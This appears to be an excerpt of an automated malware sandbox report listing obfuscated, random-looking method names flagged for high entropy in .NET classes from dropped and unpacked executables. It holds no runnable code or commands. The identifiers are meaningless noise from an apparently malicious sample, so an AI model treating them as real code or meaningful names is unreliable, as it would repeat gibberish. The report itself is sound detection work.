Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
